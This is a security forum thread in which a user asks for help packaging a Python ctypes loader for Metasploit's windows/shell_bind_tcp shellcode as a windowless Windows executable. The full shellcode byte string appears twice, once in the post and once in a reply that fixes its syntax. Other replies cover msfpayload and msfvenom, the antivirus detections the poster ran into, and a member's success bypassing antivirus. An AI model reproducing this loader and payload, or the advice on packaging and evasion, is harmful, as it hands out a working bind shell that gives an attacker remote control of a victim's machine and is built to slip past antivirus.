Jump to content

Python/c Problem


Recommended Posts

Hello hak5,

I am having an issue getting C shellcode to compile from within a python script. What I am trying to do is use pyinstaller to make an .exe out of a python script.

from ctypes import *


shellcode = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()

The above is the script I want to create a .exe out of. The shellcode is in C and it was generated via the following command and pasted into the script.

./msfpayload windows/shell_bind_tcp C 

Now when I try to build an .exe out of it using pyinstaller, I issue the following:

$ python Configure.py
....
*completes successfully*

$ python Makespec.py --onefile --noconsole pyshell.py
wrote /home/pyinstaller-1.5.1/pyshell/pyshell.spec
now run Build.py to build the executable

$ python Build.py pyshell/pyshell.spec
checking Analysis
building Analysis because outAnalysis0.toc non existent
running Analysis outAnalysis0.toc
Analyzing: support/_mountzlib.py
Analyzing: support/useUnicode.py
Analyzing: pyshell.py
Traceback (most recent call last):
  File "Build.py", line 1494, in <module>
    main(args[0], configfilename=opts.configfile)
  File "Build.py", line 1472, in main
    build(specfile)
  File "Build.py", line 1429, in build
    execfile(spec)
  File "pyshell/pyshell.spec", line 3, in <module>
    pathex=['/home/pyth0n/Desktop/works_in_progress/pyinstaller/pyinstaller-1.5.1'])
  File "Build.py", line 347, in __init__
    self.__postinit__()
  File "Build.py", line 298, in __postinit__
    self.assemble()
  File "Build.py", line 416, in assemble
    analyzer.analyze_script(script)
  File "/home/pyth0n/Desktop/works_in_progress/pyinstaller/pyinstaller-1.5.1/mf.py", line 565, in analyze_script
    co = compile(string.replace(stuff, "\r\n", "\n"), fnm, 'exec')
ValueError: invalid \x escape

It appears that the script is being run and python is literally interpreting the /x as an escape and I want it to read it as a regular string without paying any mind to the contents. Presumably it will go onto to compile it and give me the .exe and it would be Windows ready.

Also tried playing with the syntax of the shellcode, removing the ' and " characters to no avail.

Anyone know what's going on here?

Edited by bobbyb1980
Link to comment
Share on other sites

Try this:

shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")

Link to comment
Share on other sites

I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form.

You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment).

Thanks for the tip. You mean like piping msfpayload to msfencode (same thing in essence as msfvenom ie msfpayload multi/handler PAYLOAD=... | msfencode .... -o whatever.exe?) for an .exe? If I understand you right, I tried that but was being picked up on most anti virus scanners.

I also tried msfvenom with various iteration combos w/no luck. I think most of the av's are going to detect msfencoded data.

Currently trying to learn shellcoding and it can be a real brain twister. Doing these labs, http://projectshellcode.com/?q=node/12 .

Link to comment
Share on other sites

Actually I've good success bypassing AV with metasploit. Shellcode isn't too hard. Have you played with the nasm shell in metasploit? Another easy way for messing with shellcode is to just load a regular program in in OllyDbg, scroll down to the NULLs at the end of the section, hit space, and start typing your assembly. The debugger will display the op codes in the column to the left of the instructions.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...